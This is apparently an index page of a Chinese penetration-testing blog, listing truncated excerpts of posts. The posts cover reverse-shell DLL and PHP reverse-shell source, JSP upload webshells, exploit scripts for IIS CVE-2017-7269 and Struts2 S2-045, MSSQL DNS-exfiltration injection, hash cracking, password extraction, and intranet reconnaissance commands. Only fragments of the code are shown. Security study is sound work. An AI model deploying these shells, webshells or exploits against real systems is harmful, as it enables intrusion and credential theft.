runassystem权限小工具

@echo off ver|findstr "5\.[0-9]\.[0-9][0-9]*" >NUL 2>NUL && (echo [-] Not Working for winxp\win2k3 &&goto :EOF) del /f /q %result_file% >NUL 2>NUL Rd "%WinDir%\system...

reverse shell dll 源码

#pragma comment(lib,"Ws2_32.lib") #include <WinSock2.h> #include <stdlib.h> WSADATA wsaData; SOCKET Winsock; SOCKET Sock; struct sockaddr_in hax; STARTUPINFO ini_processo; PR...

关于mssql public权限

1、public 能执行 xp_dirtree 函数 (可以用来dns 回显注入)2、public 权限下不能列任何目录(网上很多文章说public能列)3、mssql dns 回显注入: 网上教程说需要两个域名,实际一个域名就可以:) 配置域名: 条件:...

nc 反弹dll

// dllmain.cpp : 定义 DLL 应用程序的入口点。 #include "stdafx.h" #include <winsock2.h> #include <stdlib.h> #pragma comment(lib,"ws2_32") void reverse_shell(); WSADATA wsaData;...

netcat 及其姐妹工具

转载:http://www.cnblogs.com/starspace/archive/2009/02/17/1392830.html 最喜欢netcat工具了。 一般杀毒软件会把netcat杀掉。 可以用netcat clone 工具CryptCat,支持ssh,还免杀。 查询了一下,n...

CVE-2017-7269 (iis 6 远程执行漏洞)相关脚本

特性:支持 https 支持域名 如果路径错误将自动爆破物理 回显 加入web路径 参考: [1]   https://www.t00ls.net/thread-38987-1-1.html [2] https://ht-sec.org/cve-2017-7269-vulnerabilit...

URL 采集(Google)

来源:https://evi1cg.me/archives/URL.html 作者:Evi1cg var h3 = document.getElementsByTagName('h3'); for(var i=0;i<h3.length;i++){ var a = h3[i]. getElementsByTagName('a'); console...

几款jsp 上传代码

1、sqlmap 带的jsp 上传代码 <jsp:useBean id="prop" scope="page" class="java.util.Properties" /> <%@ page import="java.io.*,java.util.*,javax.servlet.*" %> <%! public String getB...

Strust2 S2-045 一些利用代码

下面几个脚本不错 http://thief.one/2017/03/07/Struts2-045%E6%BC%8F%E6%B4%9E/ https://github.com/tengzhangchao/Struts2_045-Poc 上传文件版 版权归 @_luan 及t00ls 所有 本人(lostwolf)只是修改了下更好用的...

内网渗透概述

[pdfviewer width="100%" height="849px" beta="true/false"]http://7xsnf8.com1.z0.glb.clouddn.com/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E7%AE%80%E8%BF%B0v1.0.pdf[/pdfviewer]

office卸载套件

office 系列产品 卸载极其蛋疼 卸载不干净再装新版本会出现各种问题 以下工具可卸载微软各个版本软件 1、Office 2010 套件删除工具 对于 Windows 8 使用 MicrosoftFixit20055.mini.diagcab 对于 Windows 7...

渗透利器之hash破解

*本博客文章可随意转载,但请注明来源 本文链接:http://wolvez.club/?p=509 0x01 了解hash类型 1 识别hash类型 1.1、  hashID 项目主页:http://psypanda.github.io/hashID/ *kali 下 Hash Identifier...

渗透利器之内网信息获取工具

1、NetBIOS 名称表查询 nbtscan 官网连接: http://www.unixwiz.net/tools/nbtscan.html 简述: nbtscan 实用程序是由 unixwiz.net(http://www.unixwiz.net/tools/nbtscan.html)的Steve Fri...

渗透利器之本地客户端程序密码获取

原创文章 欢迎转载 转载请注明来源:http://wolvez.club/?p=498 严重推荐 http://securityxploded.com/password-recovery-tools.php 相关工具 以及 http://www.nirsoft.net/ 相关工具 以下工具均来源于...

在不需要知道密码的情况下 Hacking MSSQL

本文翻译自:https://blog.anitian.com/hacking-microsoft-sql-server-without-a-password/ 原作者:Rick Osgood 版权归原作者所有 0x01 前言 在最近的一次渗透测试中,我抓包的时候无意中注意到一些没...

命令行下基础信息收集

使用wmic识别安装到系统中的补丁情况 C:\> wmic qfe get description,installedOn 识别正在运行的服务 C:\>sc query type= service C:\>net start 识别开机启动的程序,包括路径 C:\>wmic ...

nmap 语法

1、常见端口扫描 map [Scan Type(s)] [Options] {target specification} scan type(s) 用于指定扫描类型 options 用于指定选项 target specification 用于指定扫描目标 -s 指定扫描类型 如下: -sP ...

一些批处理笔记

1、延时的三种方法: TIMEOUT /T 10 2>nul choice /t 10 /d y /n ping -n 10 127.0.0.1 >nul 推荐用 timeout 命令更省资源更精确,win2k3及以上自带该命令,xp及以下版本不带该命令 choice win7 (win20...

进程监控小脚本

新添加功能: 每秒刷新监控指定进程 r参数 @echo off setlocal EnableDelayedExpansion set process=%1 set Refresh=%2 ::code by lostwolf ::如果不存在 打印帮助信息 if not...

mysql dump脚本

首发于: https://www.t00ls.net/thread-25759-1-1.html 测试1000w 数据正常dump! 作者:lostwolf 平時有權限訪問數據庫目錄的話 直接下載該數據庫目錄 有權限執行命令的話 通過mysqldump 、或者into outfil...

php 反弹shell

该反弹shell 跟 nc 反弹效果是一样的 和传统php 反弹不一样的是 使用php自己的函数 传统shell 里面调用perl 该shell 仅支持linux 半交互 执行 passwd 命令可正常输入 代码来源 : http://pentestmonkey.net/to...

.net 环境下载安装

命令行安装 .net 4.0(管理员权限) dotNetFx40_Client_x86_x64.exe /q /norestart /ChainingPackage FullX64Bootstrapper /log %temp%\test.html 一些.net 环境 https://www.microsoft.com/en-us/d...

php 版iisspy

作者:dust2 文章来源:https://www.t00ls.net/viewthread.php?tid=22864 日期:2013-5-16 [crayon-595234144abe8447125083/] 以下是本人(lostwolf) 日期:2012-7-28 发于 90sec 版本 来源:https://fo...

wmic 常用技巧

[crayon-595234144b638414485067/] #简单列进程 brief 简洁 full 详细 Description 进程名 Name 进程名 ExecutablePath 路径 CommandLine 执行命令 ProcessId 进程id 如查询某进程信息 [crayon-5952...